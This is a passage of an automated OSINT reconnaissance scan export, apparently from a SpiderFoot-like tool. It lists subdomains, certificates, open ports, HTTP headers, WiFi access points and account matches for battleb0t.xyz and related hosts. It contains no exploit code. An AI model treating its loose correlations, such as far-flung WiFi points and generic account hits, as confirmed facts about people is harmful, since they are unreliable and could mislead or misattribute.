["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TDFFE (Net ID: 00:02:2D:42:1D:82) | 34.0544, -118.244 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:55:BC:8C) | 52.3759, 4.8975 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.245): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:34 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 13335 | 104.21.71.14 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | EPSON (Net ID: 00:00:48:03:3B:CF) | 41.8781, -87.6298 |
| 2023-05-12 03:09:49 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 81.170.74.34.bc.googleusercontent.com | 34.74.170.81 |
| 2023-05-12 03:27:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.128:443 | 188.114.96.0/24 |
| 2023-05-12 02:44:31 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | files.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:32 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 3 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://panel.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'UNITED STATES'], u'module': [u'US']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://panel.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'104.21.71.14']}}}, {}] | panel.battleb0t.xyz |
| 2023-05-12 02:45:16 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 4 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'2606:4700:3030::ac43:a8fc', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'2606:4700:3030::/46', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv6', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Onward (Net ID: 00:06:25:D6:7A:6F) | 39.0469, -77.4903 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=VywvBB1i7auboS6du2SyYTMISxYgv0SAv9G2irfzrfSoLR0rWIxDql%2BDKBWgGtLF7kP8CwfOUwVMXmcuqTKfEc1L%2Fjta42Of8JEwGnOgDhCKAOR2s74ejvfrFg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5eeb1a42bf-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:10:22 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 4 | 0 | None | VOIPBL Publicly Accessible PBX List [46.101.128.0/17]
http://www.voipbl.org/update | 46.101.128.0/17 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 5 | 0 | None | Netlify | {"content-length": "243", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "server": "Netlify", "etag": "\"c575cbc28e14cae03836d1d0fc69c052-ssl\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:18 GMT", "x-nf-request-id": "01H06Y2WPKRCCC7SJ49ZB68B31", "content-type": "text/css; charset=UTF-8", "age": "0"} |
| 2023-05-12 03:03:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007.github.io |
| 2023-05-12 03:24:21 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://ayhu.xyz/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA | https://ayhu.xyz/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU |
| 2023-05-12 02:55:22 | Linked URL - Internal | No | Google | 5 | 0 | 1 | 0 | None | https://ayhu.xyz/lol.html | ayhu.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:02:CF:C6:25:17) | 40.2024, 29.0398 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F4:A6:EC) | 41.8781, -87.6298 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | YouTube Channel (Category: video)
https://www.youtube.com/c/Altpapier/about | Altpapier |
| 2023-05-12 02:53:42 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 1626:5CFD:236BDF0:36406A6:645D3ABC
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100102-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683831485.544725,VS0,VE28
Vary: Accept-Encoding
X-Fastly-Request-ID: b61afadfbad522ceb47c8a79f54a7ce4c88966b0
| 185.199.109.153 |
| 2023-05-12 02:47:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.108.153:80 | 185.199.108.153 |
| 2023-05-12 02:54:23 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2489:8201::c8:443 | 2600:1f18:2489:8201::c8 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-cache-hits: 1 | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:01:28 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://nwapi.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://nwapi.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'cf-cache-status,report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.67.168.252']}}}, {}] | nwapi.battleb0t.xyz |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.176): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/master058_3.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | polygon (Category: gaming)
https://www.polygon.com/users/login | login |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | jk9@home (Net ID: 00:0C:F6:71:B1:B4) | 50.8897, 6.0563 |
| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': 